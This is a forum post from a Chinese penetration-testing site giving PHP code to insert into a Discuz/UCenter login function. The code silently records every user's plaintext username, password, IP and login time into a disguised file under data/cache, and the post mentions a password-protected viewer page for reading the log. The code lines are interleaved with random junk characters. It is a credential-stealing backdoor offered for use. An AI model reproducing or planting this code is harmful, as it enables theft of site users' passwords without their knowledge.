中国网络渗透测试联盟

标题: dz1.5记录用户名和密码 [打印本页]

作者: admin    时间: 2013-2-27 21:40
标题: dz1.5记录用户名和密码
修改uc_client目录下的client.php 在
* H7 v! q0 w$ i: T8 c' ofunction uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {
8 S- \& L5 n. X4 u2 t9 R8 `下加入如上代码,在网站./data/cache/目录下自动生成csslog.php( @4 l7 `/ R! y6 ?3 D
你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw, W: Y9 e1 ~" A4 p! p0 w6 M8 G* x
if(getenv('HTTP_CLIENT_IP')) { 4 J+ @9 W0 t) E& v+ |6 d
$onlineip = getenv('HTTP_CLIENT_IP');
, D2 S/ ^# R, Q! [  L} elseif(getenv('HTTP_X_FORWARDED_FOR')) {
) u9 f, \: m- x8 D$onlineip = getenv('HTTP_X_FORWARDED_FOR');
0 p+ w8 M8 ~2 O7 f( h( A/ T} elseif(getenv('REMOTE_ADDR')) { # [/ u! X, K& g7 O4 j0 R
$onlineip = getenv('REMOTE_ADDR');1 F4 A8 W, D& `8 ]* d1 m
} else { 5 U# u5 A0 h" k9 \* j# S
$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];
8 o( ]' f- N1 R}
( I+ M! ]7 [& [3 N0 j  N% P! x. j     $showtime=date("Y-m-d H:i:s");
& t2 W5 K/ x- ~1 g( ^7 b    $record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";
6 j/ w9 q" m4 O6 X    $handle=fopen('./data/cache/csslog.php','a+');1 d" H4 k  a* V2 k* C# m
    $write=fwrite($handle,$record);




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2